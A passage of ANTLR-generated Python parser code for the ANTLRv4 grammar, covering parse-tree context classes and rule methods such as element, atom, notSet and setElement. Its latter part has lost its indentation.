        self.copyFrom(ctx)

    def actionBlock(self):
        return self.getTypedRuleContext(ANTLRv4Parser.ActionBlockContext,0)

    def QUESTION(self):
        return self.getToken(ANTLRv4Parser.QUESTION, 0)

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterParserElementAction" ):
            listener.enterParserElementAction(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitParserElementAction" ):
            listener.exitParserElementAction(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitParserElementAction" ):
            return visitor.visitParserElementAction(self)
        else:
            return visitor.visitChildren(self)
def element(self):
    """Parse the `element` rule (rule index 92).

    Selects one of five alternatives via adaptive prediction (decision 59):
    labeled element, atom, or block — each with an optional EBNF suffix —
    an action block with an optional `?`, or an inline DOC_COMMENT token.
    The `self.state = N` assignments are generated ATN bookkeeping; keep order.
    """
    localctx = ANTLRv4Parser.ElementContext(self, self._ctx, self.state)
    self.enterRule(localctx, 92, self.RULE_element)
    self._la = 0 # Token type
    try:
        self.state = 500
        self._errHandler.sync(self)
        la_ = self._interp.adaptivePredict(self._input,59,self._ctx)
        if la_ == 1:
            # Alt 1: labeledElement ebnfSuffix?
            localctx = ANTLRv4Parser.ParserElementLabeledContext(self, localctx)
            self.enterOuterAlt(localctx, 1)
            self.state = 483
            localctx.value = self.labeledElement()
            self.state = 485
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            # Optional suffix: QUESTION, STAR or PLUS.
            if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.QUESTION) | (1 << ANTLRv4Parser.STAR) | (1 << ANTLRv4Parser.PLUS))) != 0):
                self.state = 484
                localctx.suffix = self.ebnfSuffix()
            pass

        elif la_ == 2:
            # Alt 2: atom ebnfSuffix?
            localctx = ANTLRv4Parser.ParserElementAtomContext(self, localctx)
            self.enterOuterAlt(localctx, 2)
            self.state = 487
            localctx.value = self.atom()
            self.state = 489
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.QUESTION) | (1 << ANTLRv4Parser.STAR) | (1 << ANTLRv4Parser.PLUS))) != 0):
                self.state = 488
                localctx.suffix = self.ebnfSuffix()
            pass

        elif la_ == 3:
            # Alt 3: block ebnfSuffix?
            localctx = ANTLRv4Parser.ParserElementBlockContext(self, localctx)
            self.enterOuterAlt(localctx, 3)
            self.state = 491
            localctx.value = self.block()
            self.state = 493
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.QUESTION) | (1 << ANTLRv4Parser.STAR) | (1 << ANTLRv4Parser.PLUS))) != 0):
                self.state = 492
                localctx.suffix = self.ebnfSuffix()
            pass

        elif la_ == 4:
            # Alt 4: actionBlock QUESTION?
            localctx = ANTLRv4Parser.ParserElementActionContext(self, localctx)
            self.enterOuterAlt(localctx, 4)
            self.state = 495
            self.actionBlock()
            self.state = 497
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if _la==ANTLRv4Parser.QUESTION:
                self.state = 496
                self.match(ANTLRv4Parser.QUESTION)
            pass

        elif la_ == 5:
            # Alt 5: a single DOC_COMMENT token, stored as the context value.
            localctx = ANTLRv4Parser.ParserInlineDocContext(self, localctx)
            self.enterOuterAlt(localctx, 5)
            self.state = 499
            localctx.value = self.match(ANTLRv4Parser.DOC_COMMENT)
            pass

    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class LabeledElementContext(ParserRuleContext):
    """Parse-tree context for `labeledElement`: identifier (= | +=) (atom | block)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def identifier(self):
        return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)

    def ASSIGN(self):
        return self.getToken(ANTLRv4Parser.ASSIGN, 0)

    def PLUS_ASSIGN(self):
        return self.getToken(ANTLRv4Parser.PLUS_ASSIGN, 0)

    def atom(self):
        return self.getTypedRuleContext(ANTLRv4Parser.AtomContext,0)

    def block(self):
        return self.getTypedRuleContext(ANTLRv4Parser.BlockContext,0)

    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_labeledElement

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterLabeledElement" ):
            listener.enterLabeledElement(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitLabeledElement" ):
            listener.exitLabeledElement(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitLabeledElement" ):
            return visitor.visitLabeledElement(self)
        else:
            return visitor.visitChildren(self)
def labeledElement(self):
    """Parse `labeledElement` (rule index 94).

    Shape: identifier (ASSIGN | PLUS_ASSIGN) (atom | block).
    Raises NoViableAltException when the token after the operator starts
    neither an atom nor a block.
    """
    localctx = ANTLRv4Parser.LabeledElementContext(self, self._ctx, self.state)
    self.enterRule(localctx, 94, self.RULE_labeledElement)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 502
        self.identifier()
        self.state = 503
        _la = self._input.LA(1)
        # The label operator must be `=` or `+=`; otherwise attempt inline recovery.
        if not(_la==ANTLRv4Parser.ASSIGN or _la==ANTLRv4Parser.PLUS_ASSIGN):
            self._errHandler.recoverInline(self)
        else:
            self._errHandler.reportMatch(self)
            self.consume()
        self.state = 506
        self._errHandler.sync(self)
        token = self._input.LA(1)
        if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.RULE_REF, ANTLRv4Parser.STRING_LITERAL, ANTLRv4Parser.DOT, ANTLRv4Parser.NOT]:
            self.state = 504
            self.atom()
            pass
        elif token in [ANTLRv4Parser.LPAREN]:
            self.state = 505
            self.block()
            pass
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class EbnfSuffixContext(ParserRuleContext):
    """Parse-tree context for `ebnfSuffix`: `?`, `*` or `+`, each optionally
    followed by a second `?` (per the accessor shapes below)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def QUESTION(self, i:int=None):
        # QUESTION may occur twice (e.g. `??`, `*?`, `+?`), hence the index form.
        if i is None:
            return self.getTokens(ANTLRv4Parser.QUESTION)
        else:
            return self.getToken(ANTLRv4Parser.QUESTION, i)

    def STAR(self):
        return self.getToken(ANTLRv4Parser.STAR, 0)

    def PLUS(self):
        return self.getToken(ANTLRv4Parser.PLUS, 0)

    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_ebnfSuffix

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterEbnfSuffix" ):
            listener.enterEbnfSuffix(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitEbnfSuffix" ):
            listener.exitEbnfSuffix(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitEbnfSuffix" ):
            return visitor.visitEbnfSuffix(self)
        else:
            return visitor.visitChildren(self)
def ebnfSuffix(self):
    """Parse `ebnfSuffix` (rule index 96).

    One of `?`, `*`, `+`, each optionally followed by a trailing `?`.
    """
    localctx = ANTLRv4Parser.EbnfSuffixContext(self, self._ctx, self.state)
    self.enterRule(localctx, 96, self.RULE_ebnfSuffix)
    self._la = 0 # Token type
    try:
        self.state = 520
        self._errHandler.sync(self)
        token = self._input.LA(1)
        if token in [ANTLRv4Parser.QUESTION]:
            # Alt 1: '?' '?'?
            self.enterOuterAlt(localctx, 1)
            self.state = 508
            self.match(ANTLRv4Parser.QUESTION)
            self.state = 510
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if _la==ANTLRv4Parser.QUESTION:
                self.state = 509
                self.match(ANTLRv4Parser.QUESTION)
            pass
        elif token in [ANTLRv4Parser.STAR]:
            # Alt 2: '*' '?'?
            self.enterOuterAlt(localctx, 2)
            self.state = 512
            self.match(ANTLRv4Parser.STAR)
            self.state = 514
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if _la==ANTLRv4Parser.QUESTION:
                self.state = 513
                self.match(ANTLRv4Parser.QUESTION)
            pass
        elif token in [ANTLRv4Parser.PLUS]:
            # Alt 3: '+' '?'?
            self.enterOuterAlt(localctx, 3)
            self.state = 516
            self.match(ANTLRv4Parser.PLUS)
            self.state = 518
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if _la==ANTLRv4Parser.QUESTION:
                self.state = 517
                self.match(ANTLRv4Parser.QUESTION)
            pass
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class LexerAtomContext(ParserRuleContext):
    """Generic parse-tree context for the `lexerAtom` rule.

    Concrete labeled alternatives (Not/Range/CharSet/Wildcard/Terminal)
    subclass this and adopt children via copyFrom().
    """

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_lexerAtom

    def copyFrom(self, ctx:ParserRuleContext):
        super().copyFrom(ctx)
class LexerAtomNotContext(LexerAtomContext):
    """`lexerAtom` alternative: a negated set (notSet)."""

    def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerAtomContext
        super().__init__(parser)
        self.copyFrom(ctx)

    def notSet(self):
        return self.getTypedRuleContext(ANTLRv4Parser.NotSetContext,0)

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterLexerAtomNot" ):
            listener.enterLexerAtomNot(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitLexerAtomNot" ):
            listener.exitLexerAtomNot(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitLexerAtomNot" ):
            return visitor.visitLexerAtomNot(self)
        else:
            return visitor.visitChildren(self)
class LexerAtomRangeContext(LexerAtomContext):
    """`lexerAtom` alternative: a character range (characterRange)."""

    def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerAtomContext
        super().__init__(parser)
        self.copyFrom(ctx)

    def characterRange(self):
        return self.getTypedRuleContext(ANTLRv4Parser.CharacterRangeContext,0)

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterLexerAtomRange" ):
            listener.enterLexerAtomRange(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitLexerAtomRange" ):
            listener.exitLexerAtomRange(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitLexerAtomRange" ):
            return visitor.visitLexerAtomRange(self)
        else:
            return visitor.visitChildren(self)
class LexerAtomCharSetContext(LexerAtomContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerAtomContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def LEXER_CHAR_SET(self):
return self.getToken(ANTLRv4Parser.LEXER_CHAR_SET, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerAtomCharSet" ):
listener.enterLexerAtomCharSet(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerAtomCharSet" ):
listener.exitLexerAtomCharSet(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerAtomCharSet" ):
return visitor.visitLexerAtomCharSet(self)
else:
return visitor.visitChildren(self)
class LexerAtomWildcardContext(LexerAtomContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerAtomContext
super().__init__(parser)
self.copyFrom(ctx)
def DOT(self):
return self.getToken(ANTLRv4Parser.DOT, 0)
def elementOptions(self):
return self.getTypedRuleContext(ANTLRv4Parser.ElementOptionsContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerAtomWildcard" ):
listener.enterLexerAtomWildcard(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerAtomWildcard" ):
listener.exitLexerAtomWildcard(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerAtomWildcard" ):
return visitor.visitLexerAtomWildcard(self)
else:
return visitor.visitChildren(self)
class LexerAtomTerminalContext(LexerAtomContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerAtomContext
super().__init__(parser)
self.copyFrom(ctx)
def terminal(self):
return self.getTypedRuleContext(ANTLRv4Parser.TerminalContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerAtomTerminal" ):
listener.enterLexerAtomTerminal(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerAtomTerminal" ):
listener.exitLexerAtomTerminal(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerAtomTerminal" ):
return visitor.visitLexerAtomTerminal(self)
else:
return visitor.visitChildren(self)
class LexerAtomDocContext(LexerAtomContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerAtomContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def DOC_COMMENT(self):
return self.getToken(ANTLRv4Parser.DOC_COMMENT, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerAtomDoc" ):
listener.enterLexerAtomDoc(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerAtomDoc" ):
listener.exitLexerAtomDoc(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerAtomDoc" ):
return visitor.visitLexerAtomDoc(self)
else:
return visitor.visitChildren(self)
def lexerAtom(self):
localctx = ANTLRv4Parser.LexerAtomContext(self, self._ctx, self.state)
self.enterRule(localctx, 98, self.RULE_lexerAtom)
self._la = 0 # Token type
try:
self.state = 531
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,66,self._ctx)
if la_ == 1:
localctx = ANTLRv4Parser.LexerAtomRangeContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 522
self.characterRange()
pass
elif la_ == 2:
localctx = ANTLRv4Parser.LexerAtomTerminalContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 523
self.terminal()
pass
elif la_ == 3:
localctx = ANTLRv4Parser.LexerAtomNotContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 524
self.notSet()
pass
elif la_ == 4:
localctx = ANTLRv4Parser.LexerAtomCharSetContext(self, localctx)
self.enterOuterAlt(localctx, 4)
self.state = 525
localctx.value = self.match(ANTLRv4Parser.LEXER_CHAR_SET)
pass
elif la_ == 5:
localctx = ANTLRv4Parser.LexerAtomWildcardContext(self, localctx)
self.enterOuterAlt(localctx, 5)
self.state = 526
self.match(ANTLRv4Parser.DOT)
self.state = 528
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.LT:
self.state = 527
self.elementOptions()
pass
elif la_ == 6:
localctx = ANTLRv4Parser.LexerAtomDocContext(self, localctx)
self.enterOuterAlt(localctx, 6)
self.state = 530
localctx.value = self.match(ANTLRv4Parser.DOC_COMMENT)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class AtomContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return ANTLRv4Parser.RULE_atom
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class AtomTerminalContext(AtomContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.AtomContext
super().__init__(parser)
self.copyFrom(ctx)
def terminal(self):
return self.getTypedRuleContext(ANTLRv4Parser.TerminalContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAtomTerminal" ):
listener.enterAtomTerminal(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAtomTerminal" ):
listener.exitAtomTerminal(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitAtomTerminal" ):
return visitor.visitAtomTerminal(self)
else:
return visitor.visitChildren(self)
class AtomWildcardContext(AtomContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.AtomContext
super().__init__(parser)
self.copyFrom(ctx)
def DOT(self):
return self.getToken(ANTLRv4Parser.DOT, 0)
def elementOptions(self):
return self.getTypedRuleContext(ANTLRv4Parser.ElementOptionsContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAtomWildcard" ):
listener.enterAtomWildcard(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAtomWildcard" ):
listener.exitAtomWildcard(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitAtomWildcard" ):
return visitor.visitAtomWildcard(self)
else:
return visitor.visitChildren(self)
class AtomRuleRefContext(AtomContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.AtomContext
super().__init__(parser)
self.copyFrom(ctx)
def ruleref(self):
return self.getTypedRuleContext(ANTLRv4Parser.RulerefContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAtomRuleRef" ):
listener.enterAtomRuleRef(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAtomRuleRef" ):
listener.exitAtomRuleRef(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitAtomRuleRef" ):
return visitor.visitAtomRuleRef(self)
else:
return visitor.visitChildren(self)
class AtomNotContext(AtomContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.AtomContext
super().__init__(parser)
self.copyFrom(ctx)
def notSet(self):
return self.getTypedRuleContext(ANTLRv4Parser.NotSetContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAtomNot" ):
listener.enterAtomNot(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAtomNot" ):
listener.exitAtomNot(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitAtomNot" ):
return visitor.visitAtomNot(self)
else:
return visitor.visitChildren(self)
def atom(self):
localctx = ANTLRv4Parser.AtomContext(self, self._ctx, self.state)
self.enterRule(localctx, 100, self.RULE_atom)
self._la = 0 # Token type
try:
self.state = 540
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.STRING_LITERAL]:
localctx = ANTLRv4Parser.AtomTerminalContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 533
self.terminal()
pass
elif token in [ANTLRv4Parser.RULE_REF]:
localctx = ANTLRv4Parser.AtomRuleRefContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 534
self.ruleref()
pass
elif token in [ANTLRv4Parser.NOT]:
localctx = ANTLRv4Parser.AtomNotContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 535
self.notSet()
pass
elif token in [ANTLRv4Parser.DOT]:
localctx = ANTLRv4Parser.AtomWildcardContext(self, localctx)
self.enterOuterAlt(localctx, 4)
self.state = 536
self.match(ANTLRv4Parser.DOT)
self.state = 538
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.LT:
self.state = 537
self.elementOptions()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class NotSetContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return ANTLRv4Parser.RULE_notSet
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class NotBlockContext(NotSetContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.NotSetContext
super().__init__(parser)
self.value = None # BlockSetContext
self.copyFrom(ctx)
def NOT(self):
return self.getToken(ANTLRv4Parser.NOT, 0)
def blockSet(self):
return self.getTypedRuleContext(ANTLRv4Parser.BlockSetContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterNotBlock" ):
listener.enterNotBlock(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitNotBlock" ):
listener.exitNotBlock(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitNotBlock" ):
return visitor.visitNotBlock(self)
else:
return visitor.visitChildren(self)
class NotElementContext(NotSetContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.NotSetContext
super().__init__(parser)
self.value = None # SetElementContext
self.copyFrom(ctx)
def NOT(self):
return self.getToken(ANTLRv4Parser.NOT, 0)
def setElement(self):
return self.getTypedRuleContext(ANTLRv4Parser.SetElementContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterNotElement" ):
listener.enterNotElement(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitNotElement" ):
listener.exitNotElement(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitNotElement" ):
return visitor.visitNotElement(self)
else:
return visitor.visitChildren(self)
def notSet(self):
localctx = ANTLRv4Parser.NotSetContext(self, self._ctx, self.state)
self.enterRule(localctx, 102, self.RULE_notSet)
try:
self.state = 546
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,69,self._ctx)
if la_ == 1:
localctx = ANTLRv4Parser.NotElementContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 542
self.match(ANTLRv4Parser.NOT)
self.state = 543
localctx.value = self.setElement()
pass
elif la_ == 2:
localctx = ANTLRv4Parser.NotBlockContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 544
self.match(ANTLRv4Parser.NOT)
self.state = 545
localctx.value = self.blockSet()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class BlockSetContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
self._setElement = None # SetElementContext
self.elements = list() # of SetElementContexts
def LPAREN(self):
return self.getToken(ANTLRv4Parser.LPAREN, 0)
def RPAREN(self):
return self.getToken(ANTLRv4Parser.RPAREN, 0)
def setElement(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.SetElementContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.SetElementContext,i)
def OR(self, i:int=None):
if i is None:
return self.getTokens(ANTLRv4Parser.OR)
else:
return self.getToken(ANTLRv4Parser.OR, i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_blockSet
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterBlockSet" ):
listener.enterBlockSet(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitBlockSet" ):
listener.exitBlockSet(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitBlockSet" ):
return visitor.visitBlockSet(self)
else:
return visitor.visitChildren(self)
def blockSet(self):
localctx = ANTLRv4Parser.BlockSetContext(self, self._ctx, self.state)
self.enterRule(localctx, 104, self.RULE_blockSet)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 548
self.match(ANTLRv4Parser.LPAREN)
self.state = 549
localctx._setElement = self.setElement()
localctx.elements.append(localctx._setElement)
self.state = 554
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==ANTLRv4Parser.OR:
self.state = 550
self.match(ANTLRv4Parser.OR)
self.state = 551
localctx._setElement = self.setElement()
localctx.elements.append(localctx._setElement)
self.state = 556
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 557
self.match(ANTLRv4Parser.RPAREN)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class SetElementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return ANTLRv4Parser.RULE_setElement
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class SetElementRefContext(SetElementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.SetElementContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def TOKEN_REF(self):
return self.getToken(ANTLRv4Parser.TOKEN_REF, 0)
def elementOptions(self):
return self.getTypedRuleContext(ANTLRv4Parser.ElementOptionsContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSetElementRef" ):
listener.enterSetElementRef(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSetElementRef" ):
listener.exitSetElementRef(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitSetElementRef" ):
return visitor.visitSetElementRef(self)
else:
return visitor.visitChildren(self)
class SetElementRangeContext(SetElementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.SetElementContext
super().__init__(parser)
self.copyFrom(ctx)
def characterRange(self):
return self.getTypedRuleContext(ANTLRv4Parser.CharacterRangeContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSetElementRange" ):
listener.enterSetElementRange(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSetElementRange" ):
listener.exitSetElementRange(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitSetElementRange" ):
return visitor.visitSetElementRange(self)
else:
return visitor.visitChildren(self)
class SetElementLitContext(SetElementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.SetElementContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def STRING_LITERAL(self):
return self.getToken(ANTLRv4Parser.STRING_LITERAL, 0)
def elementOptions(self):
return self.getTypedRuleContext(ANTLRv4Parser.ElementOptionsContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSetElementLit" ):
listener.enterSetElementLit(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSetElementLit" ):
listener.exitSetElementLit(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitSetElementLit" ):
return visitor.visitSetElementLit(self)
else:
return visitor.visitChildren(self)
class SetElementCharSetContext(SetElementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.SetElementContext
super().__init__(parser)
self.value = None # Token
self.copyFrom(ctx)
def LEXER_CHAR_SET(self):
return self.getToken(ANTLRv4Parser.LEXER_CHAR_SET, 0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterSetElementCharSet" ):
listener.enterSetElementCharSet(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitSetElementCharSet" ):
listener.exitSetElementCharSet(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitSetElementCharSet" ):
return visitor.visitSetElementCharSet(self)
else:
return visitor.visitChildren(self)
def setElement(self):
localctx = ANTLRv4Parser.SetElementContext(self, self._ctx, self.state)
self.enterRule(localctx, 106, self.RULE_setElement)
self._la = 0 # Token type
try:
self.state = 569
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,73,self._ctx)
if la_ == 1:
localctx = ANTLRv4Parser.SetElementRefContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 559
localctx.value = self.match(ANTLRv4Parser.TOKEN_REF)
self.state = 561
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.LT:
self.state = 560
self.elementOptions()
pass
elif la_ == 2:
localctx = ANTLRv4Parser.SetElementLitContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 563
localctx.value = self.match(ANTLRv4Parser.STRING_LITERAL)
self.state = 565
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==ANTLRv4Parser.LT:
self.state = 564
self.elementOptions()
pass
elif la_ == 3:
localctx = ANTLRv4Parser.SetElementRangeContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 567
self.characterRange()
pass
elif la_ == 4:
localctx = ANTLRv4Parser.SetElementCharSetContext(self, localctx)
self.enterOuterAlt(localctx, 4)
self.state = 568
localctx.value = self.match(ANTLRv4Parser.LEXER_CHAR_SET)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class BlockContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def LPAREN(self):
return self.getToken(ANTLRv4Parser.LPAREN, 0)
def altList(self):
return self.getTypedRuleContext(ANTLRv4Parser.AltListContext,0)
def RPAREN(self):
return self.getToken(ANTLRv4Parser.RPAREN, 0)
def COLON(self):
return self.getToken(ANTLRv4Parser.COLON, 0)
def optionsSpec(self):
return self.getTypedRuleContext(ANTLRv4Parser.OptionsSpecContext,0)
def ruleAction(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(ANTLRv4Parser.RuleActionContext)
else:
return self.getTypedRuleContext(ANTLRv4Parser.RuleActionContext,i)
def getRuleIndex(self):
return ANTLRv4Parser.RULE_block
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterBlock" ):
listener.enterBlock(self)
